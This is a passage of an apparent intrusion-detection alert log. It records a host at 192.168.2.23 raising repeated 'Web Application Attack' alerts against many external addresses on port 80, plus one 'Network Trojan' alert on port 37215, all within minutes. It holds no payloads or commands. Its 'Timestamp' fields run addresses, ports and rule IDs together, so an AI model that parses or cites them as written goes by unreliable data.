    Source Port:35116
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.57.21433680802839471 02/14/24-09:30:11.442813
    SID:2839471
    Source Port:33680
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.225.8960752802839471 02/14/24-09:30:25.502908
    SID:2839471
    Source Port:60752
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.83.8660776802839471 02/14/24-09:28:47.356183
    SID:2839471
    Source Port:60776
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.221.151.1354978802839471 02/14/24-09:30:18.586705
    SID:2839471
    Source Port:54978
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.55.13145728802839471 02/14/24-09:29:23.932933
    SID:2839471
    Source Port:45728
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.147.179.18256268802839471 02/14/24-09:27:52.686623
    SID:2839471
    Source Port:56268
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.86.73.18850170802839471 02/14/24-09:29:08.636256
    SID:2839471
    Source Port:50170
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.0.133.23632850802839471 02/14/24-09:29:46.676509
    SID:2839471
    Source Port:32850
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.46.49.15942878802839471 02/14/24-09:28:23.192539
    SID:2839471
    Source Port:42878
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.173.228.22649092802839471 02/14/24-09:29:36.022452
    SID:2839471
    Source Port:49092
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.17.48.4934424802839471 02/14/24-09:29:52.463933
    SID:2839471
    Source Port:34424
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.102.200.12055310802839471 02/14/24-09:27:53.192870
    SID:2839471
    Source Port:55310
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.49.24441738802839471 02/14/24-09:29:08.605035
    SID:2839471
    Source Port:41738
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.232.9143862802839471 02/14/24-09:29:40.519028
    SID:2839471
    Source Port:43862
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.58.240.21648294802839471 02/14/24-09:30:22.075385
    SID:2839471
    Source Port:48294
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.218.4355204802839471 02/14/24-09:29:58.799556
    SID:2839471
    Source Port:55204
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.237.86.25157848802839471 02/14/24-09:27:59.280267
    SID:2839471
    Source Port:57848
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.29.198.8834418802839471 02/14/24-09:28:22.769187
    SID:2839471
    Source Port:34418
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.180.12937936802839471 02/14/24-09:28:10.741113
    SID:2839471
    Source Port:37936
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.38.75.7843920802839471 02/14/24-09:28:54.999431
    SID:2839471
    Source Port:43920
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.18.18137846802839471 02/14/24-09:30:14.266776
    SID:2839471
    Source Port:37846
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.216.221.14047022802839471 02/14/24-09:29:24.172251
    SID:2839471
    Source Port:47022
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.221.159.8235926802839471 02/14/24-09:28:16.906122
    SID:2839471
    Source Port:35926
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.130.135.5042658802839471 02/14/24-09:30:02.346978
    SID:2839471
    Source Port:42658
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.233.3245874802839471 02/14/24-09:29:04.221536
    SID:2839471
    Source Port:45874
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.208.229.1240802802839471 02/14/24-09:29:38.017969
    SID:2839471
    Source Port:40802
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.12.17756626802839471 02/14/24-09:30:25.522677
    SID:2839471
    Source Port:56626
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.175.51.20950512802839471 02/14/24-09:30:15.804293
    SID:2839471
    Source Port:50512
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.103.182.13754716802839471 02/14/24-09:29:40.994705
    SID:2839471
    Source Port:54716
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.171.223.23059330802839471 02/14/24-09:29:25.139242
    SID:2839471
    Source Port:59330
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.0.12046302802839471 02/14/24-09:30:11.857420
    SID:2839471
    Source Port:46302
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.163.55.17936154802839471 02/14/24-09:28:19.758488
    SID:2839471
    Source Port:36154
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.131.137.24249188802839471 02/14/24-09:30:21.766585
    SID:2839471
    Source Port:49188
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.6.13.18148104802839471 02/14/24-09:28:55.247483
    SID:2839471
    Source Port:48104
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.124.65.22534494802839471 02/14/24-09:29:23.725555
    SID:2839471
    Source Port:34494
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.13.19952166802839471 02/14/24-09:29:18.893995
    SID:2839471
    Source Port:52166
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.248.141.22836872802839471 02/14/24-09:28:50.294003
    SID:2839471
    Source Port:36872
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.196.221.9945568802839471 02/14/24-09:30:22.604094
    SID:2839471
    Source Port:45568
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.167.5.22039756802839471 02/14/24-09:28:51.305191
    SID:2839471
    Source Port:39756
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.9.91.656168802839471 02/14/24-09:29:40.540498
    SID:2839471
    Source Port:56168
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.175.8.12653476802839471 02/14/24-09:28:00.921125
    SID:2839471
    Source Port:53476
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.198.171.23437068802839471 02/14/24-09:29:50.000616
    SID:2839471
    Source Port:37068
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.105.29.8942918802839471 02/14/24-09:29:36.072494
    SID:2839471
    Source Port:42918
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.182.121.11939806802839471 02/14/24-09:29:51.845517
    SID:2839471
    Source Port:39806
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.179.192.21256548802839471 02/14/24-09:29:52.924429
    SID:2839471
    Source Port:56548
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.182.78.1160824802839471 02/14/24-09:28:38.112035
    SID:2839471
    Source Port:60824
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.68.115.4450294802839471 02/14/24-09:28:23.348383
    SID:2839471
    Source Port:50294
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.114.193.10850692802839471 02/14/24-09:28:30.006330
    SID:2839471
    Source Port:50692
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.125.25.23354870802839471 02/14/24-09:29:36.445227
    SID:2839471
    Source Port:54870
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.131.147.15146324802839471 02/14/24-09:29:56.169873
    SID:2839471
    Source Port:46324
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.198.134.9741860802839471 02/14/24-09:30:07.651396
    SID:2839471
    Source Port:41860
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.140.139.14345656802839471 02/14/24-09:30:25.525596
    SID:2839471
    Source Port:45656
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.216.159.21639806802839471 02/14/24-09:29:18.307813
    SID:2839471
    Source Port:39806
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.150.13038970802839471 02/14/24-09:28:16.745395
    SID:2839471
    Source Port:38970
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.19.1949132802839471 02/14/24-09:29:23.945969
    SID:2839471
    Source Port:49132
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.99.95.12042534802839471 02/14/24-09:30:02.157655
    SID:2839471
    Source Port:42534
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.59.170.22135710802839471 02/14/24-09:28:10.802265
    SID:2839471
    Source Port:35710
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.13.10437370802839471 02/14/24-09:29:24.480141
    SID:2839471
    Source Port:37370
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.196.24.5751524802839471 02/14/24-09:28:19.518570
    SID:2839471
    Source Port:51524
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.170.27.14346860802839471 02/14/24-09:29:52.189921
    SID:2839471
    Source Port:46860
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.210.89.354138802839471 02/14/24-09:28:04.031409
    SID:2839471
    Source Port:54138
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.88.70.20933166802839471 02/14/24-09:29:30.106623
    SID:2839471
    Source Port:33166
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.34.159.7440246802839471 02/14/24-09:30:21.995209
    SID:2839471
    Source Port:40246
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.167.247.452692802839471 02/14/24-09:27:52.974805
    SID:2839471
    Source Port:52692
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.119.160.8339586802839471 02/14/24-09:27:54.896013
    SID:2839471
    Source Port:39586
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.216.175.4258486802839471 02/14/24-09:29:58.688311
    SID:2839471
    Source Port:58486
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.99.147.550424802839471 02/14/24-09:30:16.008364
    SID:2839471
    Source Port:50424
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.221.248.7049600802839471 02/14/24-09:30:02.507864
    SID:2839471
    Source Port:49600
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.233.139.24247144802839471 02/14/24-09:29:15.813181
    SID:2839471
    Source Port:47144
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.90.14.2249480802839471 02/14/24-09:27:45.916355
    SID:2839471
    Source Port:49480
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.176.9154906802839471 02/14/24-09:29:53.080553
    SID:2839471
    Source Port:54906
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.97.176.1440376802839471 02/14/24-09:30:23.049688
    SID:2839471
    Source Port:40376
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.149.250.16842536802839471 02/14/24-09:30:25.748570
    SID:2839471
    Source Port:42536
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.13.125.2658592802839471 02/14/24-09:28:47.277311
    SID:2839471
    Source Port:58592
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.181.239.1059696802839471 02/14/24-09:29:24.050304
    SID:2839471
    Source Port:59696
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.81.149.18353088802839471 02/14/24-09:30:21.575552
    SID:2839471
    Source Port:53088
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.221.70.22851982802839471 02/14/24-09:28:14.073183
    SID:2839471
    Source Port:51982
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.198.154.13537728802839471 02/14/24-09:28:14.085903
    SID:2839471
    Source Port:37728
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.165.90.23554018802839471 02/14/24-09:28:13.671604
    SID:2839471
    Source Port:54018
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.99.249.25445222802839471 02/14/24-09:28:14.083074
    SID:2839471
    Source Port:45222
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.99.175.1855218802839471 02/14/24-09:30:25.937931
    SID:2839471
    Source Port:55218
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.143.177.13450924802839471 02/14/24-09:29:23.953654
    SID:2839471
    Source Port:50924
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.185.241.21960406802839471 02/14/24-09:29:14.168984
    SID:2839471
    Source Port:60406
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.198.127.24535028802839471 02/14/24-09:29:30.063338
    SID:2839471
    Source Port:35028
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.211.2742024802839471 02/14/24-09:29:04.240277
    SID:2839471
    Source Port:42024
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.235.214.17158686802839471 02/14/24-09:28:07.082880
    SID:2839471
    Source Port:58686
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.173.164.5152832802839471 02/14/24-09:29:32.984840
    SID:2839471
    Source Port:52832
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.164.254.5450488802839471 02/14/24-09:28:16.654188
    SID:2839471
    Source Port:50488
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.73.152.25545798802839471 02/14/24-09:30:16.024813
    SID:2839471
    Source Port:45798
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.153.134.3657688802839471 02/14/24-09:28:51.330483
    SID:2839471
    Source Port:57688
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.198.229.24654178802839471 02/14/24-09:29:06.102823
    SID:2839471
    Source Port:54178
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.74.96.2657744802839471 02/14/24-09:30:03.240302
    SID:2839471
    Source Port:57744
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.114.12453140802839471 02/14/24-09:28:29.517745
    SID:2839471
    Source Port:53140
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.190.6146932802839471 02/14/24-09:28:04.045650
    SID:2839471
    Source Port:46932
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.31.224.746052802839471 02/14/24-09:30:13.096088
    SID:2839471
    Source Port:46052
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.173.180.7445446802839471 02/14/24-09:28:20.134315
    SID:2839471
    Source Port:45446
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.221.149.15247578802839471 02/14/24-09:30:01.937375
    SID:2839471
    Source Port:47578
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.7.18055254802839471 02/14/24-09:30:11.438613
    SID:2839471
    Source Port:55254
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.228.168.23445346802839471 02/14/24-09:29:51.813756
    SID:2839471
    Source Port:45346
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.219.58.3544112802839471 02/14/24-09:28:33.194577
    SID:2839471
    Source Port:44112
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.97.189.18246600802839471 02/14/24-09:29:12.905470
    SID:2839471
    Source Port:46600
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.86.103.9449804802839471 02/14/24-09:29:40.535639
    SID:2839471
    Source Port:49804
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.99.104.1739262802839471 02/14/24-09:30:01.952764
    SID:2839471
    Source Port:39262
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.71.20558636802839471 02/14/24-09:27:45.906429
    SID:2839471
    Source Port:58636
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.72.9540512802839471 02/14/24-09:28:32.895212
    SID:2839471
    Source Port:40512
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.168.203.16337178802839471 02/14/24-09:29:08.815869
    SID:2839471
    Source Port:37178
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.67.88.453448802839471 02/14/24-09:29:51.830248
    SID:2839471
    Source Port:53448
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.11.7649650802839471 02/14/24-09:27:59.286174
    SID:2839471
    Source Port:49650
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.70.156.5058912802839471 02/14/24-09:27:57.721226
    SID:2839471
    Source Port:58912
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23197.246.141.1752504372152829579 02/14/24-09:29:33.287791
    SID:2829579
    Source Port:52504
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23112.185.223.11950640802839471 02/14/24-09:28:11.268359
    SID:2839471
    Source Port:50640
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.57.110.8954212802839471 02/14/24-09:28:39.850386
    SID:2839471
    Source Port:54212
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.188.70.3854100802839471 02/14/24-09:28:32.692836
    SID:2839471
    Source Port:54100
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.236.8635114802839471 02/14/24-09:29:12.895189
    SID:2839471
    Source Port:35114
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.213.238.6953502802839471 02/14/24-09:29:15.490054
    SID:2839471
    Source Port:53502
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.227.15841548802839471 02/14/24-09:30:11.437235
    SID:2839471
    Source Port:41548
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.212.236.4458970802839471 02/14/24-09:29:45.898333
    SID:2839471
    Source Port:58970
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.110.223.14444726802839471 02/14/24-09:28:49.340445
    SID:2839471
    Source Port:44726
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.210.6658200802839471 02/14/24-09:28:26.069185
    SID:2839471
    Source Port:58200
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.15.44.20136500802839471 02/14/24-09:30:15.948895
    SID:2839471
    Source Port:36500
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.169.186.21543252802839471 02/14/24-09:28:01.088456
    SID:2839471
    Source Port:43252
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.133.19.3153460802839471 02/14/24-09:29:52.218101
    SID:2839471
    Source Port:53460
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.165.90.23553996802839471 02/14/24-09:28:12.112287
    SID:2839471
    Source Port:53996
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.121.12042604802839471 02/14/24-09:29:42.976136
    SID:2839471
    Source Port:42604
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.26.248.10357062802839471 02/14/24-09:29:38.044745
    SID:2839471
    Source Port:57062
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.182.12939728802839471 02/14/24-09:28:10.749931
    SID:2839471
    Source Port:39728
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.193.231.12350324802839471 02/14/24-09:28:52.972108
    SID:2839471
    Source Port:50324
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.42.21.10838920802839471 02/14/24-09:28:40.803893
    SID:2839471
    Source Port:38920
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.125.90.5349072802839471 02/14/24-09:27:59.103960
    SID:2839471
    Source Port:49072
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.99.58.23857324802839471 02/14/24-09:30:21.563970
    SID:2839471
    Source Port:57324
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.104.30.15751728802839471 02/14/24-09:29:48.045294
    SID:2839471
    Source Port:51728
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.86.193.21733036802839471 02/14/24-09:30:16.056657
    SID:2839471
    Source Port:33036
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.99.203.16552322802839471 02/14/24-09:29:30.085432
    SID:2839471
    Source Port:52322
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.249.192.7747698802839471 02/14/24-09:29:50.326426
    SID:2839471
    Source Port:47698
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.56.17.3141482802839471 02/14/24-09:29:04.304539
    SID:2839471
    Source Port:41482
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.12.91.12451824802839471 02/14/24-09:30:12.978098
    SID:2839471
    Source Port:51824
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.179.136.13257944802839471 02/14/24-09:28:23.324354
    SID:2839471
    Source Port:57944
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.78.125.8555736802839471 02/14/24-09:27:52.686553
    SID:2839471
    Source Port:55736
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.179.188.9144648802839471 02/14/24-09:28:55.202511
    SID:2839471
    Source Port:44648
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.47.8842882802839471 02/14/24-09:28:19.935891
    SID:2839471
    Source Port:42882
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.196.3.8956708802839471 02/14/24-09:29:48.086733
    SID:2839471
    Source Port:56708
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.167.47.13450560802839471 02/14/24-09:28:01.109435
    SID:2839471
    Source Port:50560
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.70.2148640802839471 02/14/24-09:28:44.449416
    SID:2839471
    Source Port:48640
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.163.85.5534834802839471 02/14/24-09:29:19.328625
    SID:2839471
    Source Port:34834
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.222.171.13338992802839471 02/14/24-09:29:36.387882
    SID:2839471
    Source Port:38992
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.74.58.20243896802839471 02/14/24-09:29:01.191100
    SID:2839471
    Source Port:43896
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.216.243.18458036802839471 02/14/24-09:29:51.822913
    SID:2839471
    Source Port:58036
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.125.88.5153594802839471 02/14/24-09:29:01.534531
    SID:2839471
    Source Port:53594
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.95.139.15256774802839471 02/14/24-09:28:11.460050
    SID:2839471
    Source Port:56774
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.216.223.16041642802839471 02/14/24-09:29:55.867900
    SID:2839471
    Source Port:41642
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.126.71.7239760802839471 02/14/24-09:29:12.675045
    SID:2839471
    Source Port:39760
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.216.94.23456740802839471 02/14/24-09:27:55.229136
    SID:2839471
    Source Port:56740
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.196.118.12355390802839471 02/14/24-09:29:05.983813
    SID:2839471
    Source Port:55390
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.12.141.11352072802839471 02/14/24-09:29:24.277982
    SID:2839471
    Source Port:52072
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.146.22.23436670802839471 02/14/24-09:28:39.762053
    SID:2839471
    Source Port:36670
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.17.55.2438972802839471 02/14/24-09:29:59.584615
    SID:2839471
    Source Port:38972
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.86.64.15637262802839471 02/14/24-09:30:25.559168
    SID:2839471
    Source Port:37262
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.210.100.18241970802839471 02/14/24-09:29:50.056006
    SID:2839471
    Source Port:41970
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.74.204.4857264802839471 02/14/24-09:27:59.068447
    SID:2839471
    Source Port:57264
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.31.114.22450784802839471 02/14/24-09:28:19.541657
    SID:2839471
    Source Port:50784
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.163.50.17859032802839471 02/14/24-09:29:58.688330
    SID:2839471
    Source Port:59032
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.74.125.7553494802839471 02/14/24-09:29:04.014234
    SID:2839471
    Source Port:53494
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.74.188.11053038802839471 02/14/24-09:29:27.833050
    SID:2839471
